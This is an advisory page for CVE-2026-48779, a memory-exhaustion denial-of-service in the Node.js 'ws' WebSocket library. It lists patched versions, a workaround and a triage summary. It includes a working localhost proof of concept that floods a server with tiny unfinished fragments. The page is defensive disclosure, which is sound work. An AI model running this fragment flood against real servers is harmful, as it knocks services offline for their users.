CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

CVE-2026-48779

highCVSS 7.5covered by 2 sourcesfirst seen 2026-06-09
Impact A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. Proof of concept import { WebSocket, WebSocketServer } from 'ws'; const wss = new WebSocketServer({ port: 0 }, function () { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket(ws://localhost:${port}); ws.on('open', function () { (function send() { ws.send(data, options, function (err) { if (err) return; send(); }); })(); }); ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(client close - code: ${code} reason: ${reason.toString()}); }); }); wss.on('connection', function (ws) { ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(server close - code: ${code} reason: ${reason.toString()}); }); }); Patches The vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53). Workarounds In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible. Credits The vulnerability was responsibly disclosed and fixed by Nadav Magier.

CSIRTS triage

What
Memory exhaustion can occur from tiny fragments and data chunks, leading to denial of service.
Who is affected
Deployments using the affected ws library.
Urgency
Remediation is high urgency due to the potential for service disruption.
Action
Update to the latest version of the ws library.

AI-assisted analysis generated from the source advisory — verify against the original.

⚡ Watch CVE-2026-48779

Get an email if CVE-2026-48779 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.

Exploitation outlook

Advisory coverage (2)

External references

NVD record for CVE-2026-48779

CVE.org record

Embed the live status

CVE-2026-48779 live status badge — this badge updates automatically when the KEV or exploit status changes. How to embed it →

[![CVE-2026-48779 status](https://www.csirts.com/badge/CVE-2026-48779)](https://www.csirts.com/cve/CVE-2026-48779)